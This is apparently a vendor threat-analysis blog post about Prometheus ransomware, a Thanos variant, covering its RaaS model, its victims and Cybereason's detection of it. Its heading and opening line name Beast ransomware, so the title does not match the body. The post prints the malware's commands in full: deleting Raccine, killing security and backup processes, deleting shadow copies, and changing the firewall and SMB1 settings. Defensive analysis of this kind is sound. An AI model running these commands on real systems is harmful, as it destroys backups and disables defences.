THREAT ANALYSIS: Beast Ransomware
In this Threat Analysis report, Cybereason investigates the Ransomware-as-a-Service (RaaS) known as Beast and how to defend against it through the Cybereason Defense Platform.
Cybereason Nocturnus
Prometheus is a relatively new variant of the Thanos ransomware that is operated independently by the Prometheus group, and was first observed in February of 2021. In just a short period of time, Prometheus caused a lot of damage, and breached over 40 companies.
Cybereason Detects and Blocks Prometheus Ransomware
Like other prominent ransomware groups, such as the DarkSide group, Prometheus follows the RaaS business model and operates as a professional enterprise where it refers to its victims as “customers,” and communicates with them using a customer service ticketing system.
In addition, Prometheus follows the double extortion trend and hosts a leak site, where it has a “hall of shame” for victims and posts stolen data for sale. The names of the victims are posted on the website even before the victims decide whether to pay or not, either under the status “waiting for the company decision” or “company paid, data is not for sale.”
When it comes to the affected industries and regions, the group seems to attack almost indiscriminately. According to their website, the group claims to have breached over 40 organizations from different industries/sectors. Among their victims observed were companies in the following industries: consulting, oil and gas, financial, media, governments, advertising, manufacturing, retail, food, hotels, manufacturing, insurance, transportation, and medical services. The regions affected are South America, US, UK, Middle-East, UAE, Asia and Europe.
It’s also interesting to note that some victims appear to be on the list more than once, but attacked in different time periods. Since those victims had paid, it’s unclear at this point if it’s by mistake or that the group has attacked the same victim more than once before or even after paying.
A recent Cybereason report titled Ransomware: The True Cost to Business, found that 80% of organizations that paid a ransom were hit by a second attack, and almost half of those were hit by the same threat group.
Up until June 14th, the operators of Prometheus claimed to be part of the notorious REvil ransomware group, and even mentioned them in their logo. On June 15th, the group decided to delete the name of REvil from their logo, and remove any potential relation to the group.
It is worth noting that there hasn’t been strong or conclusive evidence of a real connection or collaboration between the two groups and the assumption is that the Prometheus group was most likely just using the name and reputation of REvil to increase the likelihood of ransom payments.
Although it is unclear why the group has decided to remove the name of REvil from their logo, it’s interesting to look at the timing. The REvil group was just attributed to another major attack infecting potentially thousands of companies by way of an exploit against Kaseya VSA remote management service which propagated ransomware through the IT service provider’s Managed Services Provider network, and a recent attack against the global food company JBS which drew attention to them from the US authorities.
In May, it was the DarkSide group that made big headlines after attacking the Colonial Pipeline network, which caused the US authorities to take actions that eventually led to the DarkSide group shutting down their operations (allegedly). Ransomware operators will usually try to evade such unwanted publicity because of their fear of retaliation from law enforcement agencies.
Screenshots from the Prometheus leaks website
As mentioned in the beginning of this blog post, Prometheus is not an entirely new ransomware. It is a variant of the Thanos ransomware, which has been sold in underground forums since late 2019. The group behind Prometheus, as well as other threat actors, bought Thanos and used the builder that comes with it to customize their ransomware:
The builder used to configure Thanos. Credit: Recorded Future
Most of the distinguishing changes observed include the extension that is added to the encrypted files and of course the ransom note content. Because of that, there are different variants of the Thanos ransomware out there, with most of them named after the extension that is appended to the encrypted files.
The following table presents some of the variants found in the wild:
Ransomware Name |
Ransom note |
Extension |
Thanos |
RESTORE_FILES_INFO.txt |
.crypted random string |
Hakbit |
HOW_TO_RECOVER_YOUR_FILES.txt |
.[ID-30BC8771].[black_private@tuta.io].CRYSTAL .VIPxxx |
Abarcy |
Abarcy#2996.txt |
.abarcy |
Hard |
RESTORE_FILES_INFO.txt |
.hard |
Milleni5000 |
RESTORE_FILES_INFO.txt |
.secure |
Ravack |
HELP_ME_RECOVER_MY_FILES.txt |
.ravack |
Energy |
HOW_TO_DECYPHER_FILES.txt |
.energy[potentialenergy@mail.ru] |
Alumni |
HOW_TO_RECOVER_YOUR_FILES.txt |
.alumni |
Prometheus |
RESTORE_FILES_INFO.txt |
.[XXX-XXX-XXXX] format (unique per victim) .PROM[prometheushelp@mail[.]ch] XXXXXXXXXX[prometheusdec@yahoo[.]com] (unique per victim) |
The binary generated by the builder is an obfuscated .NET executable that consists of a main function that is responsible to decode base64 strings in memory and pass them to the other functions.
Among the functionality observed by the malware is the ability to enumerate processes and manipulate with them, changing registry keys, setting persistence, downloading additional files, collecting information about the machine and more:
The execution of the ransomware as shown in the Cybereason Defense Platform
Prometheus creates persistence by copying the file into the startup folder of the user. This ensures that the malware will continue to run after logoff-login of the user:
Adding the ransomware binary to the startup folder
Upon execution, Prometheus performs a series of tasks to ensure that it will run smoothly without interference.
These tasks include stopping common security tools and backup related processes, interacting with the registry and scheduled task, deleting files, and interacting with services.
Raccine is a ransomware prevention tool that tries to stop ransomware from deleting shadow copies in Windows. Prometheus deletes the scheduled task and the registry keys of the software:
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
reg delete HKCU\Software\Raccine /F
schtasks /DELETE /TN "Raccine Rules Updater" /F
Deleting Raccine: deleting the registry key and scheduled task and killing the process
Prometheus stops different processes that may interfere with its execution, and also to free DB related files for encryption:
taskkill.exe /IM sqlagent.exe /F taskkill.exe /IM steam.exe /F taskkill.exe /IM Ntrtscan.exe /F taskkill.exe /IM msftesql.exe /F taskkill.exe /IM tmlisten.exe /F taskkill.exe /IM dbeng50.exe /F taskkill.exe /IM mbamtray.exe /F taskkill.exe /IM firefoxconfig.exe /F taskkill.exe /IM mydesktopservice.exe /F taskkill.exe /IM synctime.exe /F taskkill.exe /IM agntsvc.exe /F taskkill.exe /IM mysqld-opt.exe /F |
taskkill.exe /IM mspub.exe /F taskkill.exe /IM PccNTMon.exe /F taskkill.exe /IM sqbcoreservice.exe /F taskkill.exe /IM visio.exe /F taskkill.exe /IM encsvc.exe /F taskkill.exe /IM thebat64.exe /F taskkill.exe /IM outlook.exe /F taskkill.exe /IM mydesktopqos.exe /F taskkill.exe /IM msaccess.exe /F taskkill.exe /IM excel.exe /F taskkill.exe /IM isqlplussvc.exe /F taskkill.exe /IM tbirdconfig.exe /F |
taskkill.exe /IM ocomm.exe /F taskkill.exe /IM CNTAoSMgr.exe /F taskkill.exe /IM onenote.exe /F taskkill.exe /IM thebat.exe /F taskkill.exe /F /IM RaccineSettings.exe taskkill.exe /IM sqlwriter.exe /F taskkill.exe /IM wordpad.exe /F taskkill.exe /IM dbsnmp.exe /F taskkill.exe /IM xfssvccon.exe /F taskkill.exe /IM powerpnt.exe /F taskkill.exe /IM mysqld.exe /F |
Process enumeration
Prometheus stops different services that may interfere with it’s execution, and also to free DB related files for encryption:
net.exe start Dnscache /y net.exe start FDResPub /y net.exe start SSDPSRV /y net.exe start upnphost /y net.exe stop BMR Boot Service /y net.exe stop BackupExecAgentAccelerator /y net.exe stop BackupExecAgentBrowser /y net.exe stop BackupExecDiveciMediaService /y net.exe stop BackupExecJobEngine /y net.exe stop BackupExecVSSProvider /y net.exe stop CAARCUpdateSvc /y net.exe stop DefWatch /y net.exe stop EPSecurityService /y net.exe stop EPUpdateService /y net.exe stop ESHASRV /y net.exe stop EhttpSrv /y net.exe stop EsgShKernel /y net.exe stop FA_Scheduler /y net.exe stop Intuit.QuickBooks.FCS /y net.exe stop KAVFS /y net.exe stop KAVFSGT /y net.exe stop MBEndpointAgent /y net.exe stop MMS /y net.exe stop MSExchangeIS /y net.exe stop MSExchangeMGMT /y net.exe stop MSSQL$SQLEXPRESS /y net.exe stop MSSQL$SQL_2008 /y net.exe stop MSSQL$SYSTEM_BGC /y net.exe stop MSSQL$TPS /y net.exe stop MSSQL$TPSAMA /y net.exe stop MSSQL$VEEAMSQL2008R2 /y net.exe stop MSSQL$VEEAMSQL2008R2 /y net.exe stop MSSQL$VEEAMSQL2012 /y |
net.exe stop MSSQLFDLauncher$PROFXENGAGEMENT /y net.exe stop MSSQLFDLauncher$SBSMONITORING /y net.exe stop MSSQLFDLauncher$SHAREPOINT /y net.exe stop MSSQLFDLauncher$SQL_2008 /y net.exe stop MSSQLFDLauncher$SYSTEM_BGC /y net.exe stop MSSQLSERVER /y net.exe stop MSSQLServerOLAPService /y net.exe stop McAfeeDLPAgentService /y net.exe stop McAfeeFrameworkMcAfeeFramework /y net.exe stop McShield /y net.exe stop MsDtsServer100 /y net.exe stop MySQL80 /y net.exe stop NetBackup BMR MTFTP Service /y net.exe stop PDVFSService /y net.exe stop PDVFSService /y net.exe stop POP3Svc /y net.exe stop QBCFMonitorService /y net.exe stop QBFCService /y net.exe stop QBIDPService /y net.exe stop RTVscan /y net.exe stop ReportServer /y net.exe stop ReportServer$SQL_2008 /y net.exe stop SDRSVC /y net.exe stop SMTPSvc /y net.exe stop SQLAgent$VEEAMSQL2008R2 /y net.exe stop SQLWriter /y net.exe stop SamSs /y net.exe stop SavRoam /y |
net.exe stop VeeamTransportSvc /y net.exe stop VeeamTransportSvc /y net.exe stop W3Svc /y net.exe stop YooBackup /y net.exe stop YooIT /y net.exe stop avpsus /y net.exe stop bedbg /y net.exe stop ccEvtMgr /y net.exe stop ccSetMgr /y net.exe stop ekrn /y net.exe stop kavfsslp /y net.exe stop klnagent /y net.exe stop macmnsvc /y net.exe stop mfemms /y net.exe stop mfewc /y net.exe stop mozyprobackup /y net.exe stop ntrtscan /y net.exe stop sophos /y net.exe stop stc_raw_agent /y net.exe stop veeam /y net.exe stop zhudongfangyu /y net.exe stop “Acronis VSS Provider” /y net.exe stop “Enterprise Client Service” /y net.exe stop “SQL Backups /y net.exe stop “Sophos AutoUpdate Service” /y net.exe stop “Sophos Clean Service” /y net.exe stop “Sophos Device Control Service” /y net.exe stop “Symantec System Recovery” /y net.exe stop VeeamBackupSvc /y net.exe stop VeeamBrokerSvc /y net.exe stop VeeamCloudSvc /y net.exe stop VeeamDeploySvc /y net.exe stop VeeamDeploymentService /y net.exe stop VeeamMountSvc /y net.exe stop VeeamNFSSvc /y net.exe stop SstpSvc /y net.exe stop VSNAPVSS /y |
Like other ransomware, Prometheus deletes the shadow copies to prevent restoring backups of the machine after encrypting files. To do so, it runs the following PowerShell command:
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
sc.exe config SSDPSRV start= auto |
Enables discovery of UPnP devices on your home network |
sc.exe config Dnscache start= auto |
Caches DNS names and registers the full computer name for your computer |
sc.exe config upnphost start= auto |
Allows UPnP devices to be hosted on your computer |
sc.exe config FDResPub start= auto |
Publishes your computer and resources attached to your computer so they can be discovered over the network |
sc.exe config SQLTELEMETRY$ECWDB2 start= disabled |
SQL service, disabled to prevent backup and unlocking files |
sc.exe config SQLTELEMETRY start= disabled |
SQL service, disabled to prevent backup and unlocking files |
sc.exe config SQLWriter start= disabled |
SQL service, disabled to prevent backup and unlocking files |
sc.exe config SstpSvc start= disabled |
Prevent users from being able to use SSTP (Secure Socket Tunneling Protocol) to access remote servers |
Once successfully executed, Prometheus will try to spread in the network using different methods. First, it will “prepare the ground” by performing some reconnaissance commands that include running “Net view” and “arp -a”, followed by a ping sweep to check the connections and potential machines to infect.
Then it continues with changing local firewall rules, downloading Psexec/Paexec and in some cases ProcessHider as well, and enabling SMB1 protocol - most likely to exploit a vulnerability for spreading using SMB, much like as EternalBlue:
netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
powershell.exe & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
After that, the malware begins the spreading process. Initially it will try an easy way using the “Net use” command to try to copy itself into shared folders. Then it will run PsExec/PaExec remotely to execute the binary. On other occasions it will try to exploit a SMB vulnerability to spread:
A VirusTotal graph showing the connection between Prometheus binaries and Psexec, Paexec and ProcessHider
After ensuring successful execution of the malware and deleting backup files, Prometheus begins it’s encryption routine. First, it will search for files matching extensions that were passed in build time. Those extensions vary from Microsoft Office files, images, scripts, archives, music, videos, and different database files:
Searching for DB files
The builder also supports a “fast mode” of encryption where only a portion of each file is encrypted. When this mode is enabled during build time, the ransomware encrypts a preconfigured amount of data from each file and overwrites the file with the encrypted content. This technique saves Prometheus time and shortens the entire encryption time, which can take just seconds up to a few minutes, depending on the number of files on the targeted machine.
Prometheus appends a custom extension that is unique for every executable and in some variants even contains the name of the victim:
Custom extension appended to the encrypted files
Finally, Prometheus drops a ransom note in .hta and text format, and presents the .hta file to the end user:
.hta file ransom note
.txt file ransom note
Ransomware attacks are on the rise. A recently released report by Cybereason, titled Ransomware: The True Cost to Business, detailed how malicious actors are fine-tuning their ransomware campaign tactics and how both the frequency and severity of successful ransomware attacks have tremendous impact on victim organizations and their ability to conduct business.
The Cybereason Defense Platform is able to prevent the execution of the Prometheus Ransomware using multi-layer protection that detects and blocks ransomware with threat intelligence, machine learning, and next-gen antivirus (NGAV) capabilities. Additionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to detect and prevent any attempt to encrypt files and automatically generates a MalopTM for it with the complete attack narrative:
Malop for Prometheus ransomware as shown in the Cybereason Defense Platform
Using the Anti-Malware feature with the right configurations (listed in the recommendations below), the Cybereason Defense Platform will also detect and prevent the execution of the ransomware and ensure that it cannot encrypt targeted files. The prevention is based on machine learning, which blocks both known and unknown malware variants:
Prevention alert of the Prometheus ransomware as shown in the Cybereason Defense Platform
Cybereason user notification for preventing the execution of Prometheus
Cybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to everywhere - including modern ransomware. Learn more about ransomware defense here or schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.
As part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including Bitbucket, Valak, Ramnit, and Racoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.
The Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.
All Posts by Cybereason NocturnusIn this Threat Analysis report, Cybereason investigates the Ransomware-as-a-Service (RaaS) known as Beast and how to defend against it through the Cybereason Defense Platform.
In this Threat Analysis report, Cybereason Security Services investigates HardBit Ransomware version 4.0, a new version observed in the wild.
In this Threat Analysis report, Cybereason investigates the Ransomware-as-a-Service (RaaS) known as Beast and how to defend against it through the Cybereason Defense Platform.
In this Threat Analysis report, Cybereason Security Services investigates HardBit Ransomware version 4.0, a new version observed in the wild.
Get the latest research, expert insights, and security industry news.
Subscribe